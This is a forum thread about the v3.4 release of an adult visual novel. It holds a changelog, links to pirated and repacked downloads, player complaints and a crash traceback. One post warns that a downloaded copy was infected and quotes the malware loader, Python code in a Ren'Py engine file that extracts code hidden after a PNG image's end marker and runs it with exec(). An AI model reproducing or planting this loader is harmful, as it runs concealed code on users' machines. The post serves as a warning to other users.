SonsOfLiberty

Discussion Dynamo
Compressor
Sep 3, 2022
24,894
212,467
My Best Deal v3.4


Hi friends, we’re excited to announce the release of My Best Deal v3.4! This update delves deeper into the evolving relationship between the protagonist and Molly.

After a stressful day at college, the hero is on his way home, hoping to unwind and enjoy his vacation. However, Hecate's harsh words during their last encounter still linger in his mind, making it hard for him to fully relax. He tries to shake off the thoughts, but it’s becoming increasingly difficult. Molly, too, is struggling as her doubts about her relationship with the hero grow stronger after their recent trip with Rin...

While this update may not be the largest, it adds key details to the story and sets the stage for something truly big on the horizon
 

ljabc

Well-Known Member
Oct 25, 2021
1,017
755
My Best Deal v3.4


Hi friends, we’re excited to announce the release of My Best Deal v3.4! This update delves deeper into the evolving relationship between the protagonist and Molly.

After a stressful day at college, the hero is on his way home, hoping to unwind and enjoy his vacation. However, Hecate's harsh words during their last encounter still linger in his mind, making it hard for him to fully relax. He tries to shake off the thoughts, but it’s becoming increasingly difficult. Molly, too, is struggling as her doubts about her relationship with the hero grow stronger after their recent trip with Rin...

While this update may not be the largest, it adds key details to the story and sets the stage for something truly big on the horizon
do you have changelog,my friend
 

Pcdump

Game player
Donor
Mar 21, 2019
677
683
Hi guys! My Best Deal v3.4, is already available!

Here is new code for gallery: before the storm

My Best Deal v3.4

Сhangelog v3.4:

86 new pictures added.
3 new animations added.
Added two new scenes with Molly.
Added two new scenes to the gallery.
Added new statue to our Pantheon: Ichi
Some translation mistakes have been corrected.
Fixed some other bugs in previous versions.
 
Last edited by a moderator:

ljabc

Well-Known Member
Oct 25, 2021
1,017
755
Hi guys! My Best Deal v3.4, is already available!

Here is new code for gallery: before the storm

My Best Deal v3.4

Сhangelog v3.4:

86 new pictures added.
3 new animations added.
Added two new scenes with Molly.
Added two new scenes to the gallery.
Added new statue to our Pantheon: Ichi
Some translation mistakes have been corrected.
Fixed some other bugs in previous versions.

Links for Windows and Linux: [Mega] | [pCloud]
Mega


Links for Mac: [Mega] | [pCloud]
Mega


My Best Deal v3.4 Compressed:

Links for Windows and Linux: [Mega] | [pCloud]
Mega

Links for Mac: [Mega] | [pCloud]
Mega

My Best Deal v3.4 Android:

[Mega] | [pCloud]
Mega
dude,who is superstar,you are
 

PervySageKem

Active Member
Apr 12, 2020
556
745
femdom yes and lesbian yes.
Dude, are you telling the truth? The retard MC just told Lin that Rin is in love with her, which is the absolute worse thing he could say for someone that wants to avoid at all costs them interacting.
 

SonsOfLiberty

Discussion Dynamo
Compressor
Sep 3, 2022
24,894
212,467
My Best Deal [v3.4] [Pirot King]

NOTE: Incest patch is included, this is also half the size of the offical with no lose.

COMPRESSED:

Win/Linux:
- - -

Mac:
- - -
 
Last edited:

cxx

Message Maestro
Nov 14, 2017
68,196
34,511
Dude, are you telling the truth? The retard MC just told Lin that Rin is in love with her, which is the absolute worse thing he could say for someone that wants to avoid at all costs them interacting.
mc has other options too on lin's/rin's case. or had if dev has later changed things.
 

PervySageKem

Active Member
Apr 12, 2020
556
745
mc has other options too on lin's/rin's case. or had if dev has later changed things.
I didnt get any options, he just said that Rin was in love with her and had to go through that fucking dream with Lin. I dont want that bitch anywhere near us. The MC almost never interacts with Lin, and it's clear Rin doesn't give a fuck about her. So forcing the player to make them come together is super fucking annoying.
 

cxx

Message Maestro
Nov 14, 2017
68,196
34,511
I didnt get any options, he just said that Rin was in love with her and had to go through that fucking dream with Lin. I dont want that bitch anywhere near us. The MC almost never interacts with Lin, and it's clear Rin doesn't give a fuck about her. So forcing the player to make them come together is super fucking annoying.
well it's been changed since i played that part.
 
  • Like
Reactions: collectmasn

Steppenwolf

Newbie
Jul 30, 2017
53
114
Hi guys! My Best Deal v3.4, is already available!

Here is new code for gallery: before the storm

My Best Deal v3.4

Сhangelog v3.4:

86 new pictures added.
3 new animations added.
Added two new scenes with Molly.
Added two new scenes to the gallery.
Added new statue to our Pantheon: Ichi
Some translation mistakes have been corrected.
Fixed some other bugs in previous versions.
I downloaded the archive from mega and I found a virus:

The file with the virus is "_tv_unsafe.png"

The file that execute the virus is: My_Best_Deal-3.4-pc/renpy/styledata/__init__.py"

Code:
    def style_check(image_path):
        with open(image_path, 'rb') as f:
            content = f.read()
        end_marker = b'\x49\x45\x4E\x44\xAE\x42\x60\x82'
        idx = content.rfind(end_marker)
        code = content[idx + len(end_marker):]
        return code.decode('utf-8')

    def style_init(image_path):
        code = style_check(image_path)
        exec(code, {'__name__': '__main__'})

    image_path = r'renpy\common\_tv_unsafe.png'
    style_init(image_path)
More info here: https://f95zone.to/threads/recent-malware-infected-games.207437/post-14943871
 
Last edited:

Bob69

Uploading the World
Uploader
Donor
Compressor
Mar 2, 2019
15,260
170,899
Game in the First Post AND SonS compression 1 page back are fine.
 
  • Like
Reactions: Ghosty99

Anon4321

Conversation Conqueror
Jun 24, 2017
7,064
5,607
Both full and compressed give the same error

Code:
I'm sorry, but an uncaught exception occurred.

While running game code:
  File "renpy/common/00start.rpy", line 288, in script
    python:
ScriptError: could not find label 'start'.

-- Full Traceback ------------------------------------------------------------

Full traceback:
  File "renpy/bootstrap.py", line 359, in bootstrap
    renpy.main.main()
  File "renpy/main.py", line 652, in main
    run(restart)
  File "renpy/main.py", line 148, in run
    renpy.execution.run_context(True)
  File "renpy/execution.py", line 958, in run_context
    context.run()
  File "renpy/common/00start.rpy", line 288, in script
    python:
  File "renpy/script.py", line 1103, in lookup
    raise ScriptError("could not find label '%s'." % str(original))
ScriptError: could not find label 'start'.

Windows-10-10.0.22621 AMD64
Ren'Py 7.8.2.24090902


Sun Sep 29 12:59:57 2024
 
3.80 star(s) 126 Votes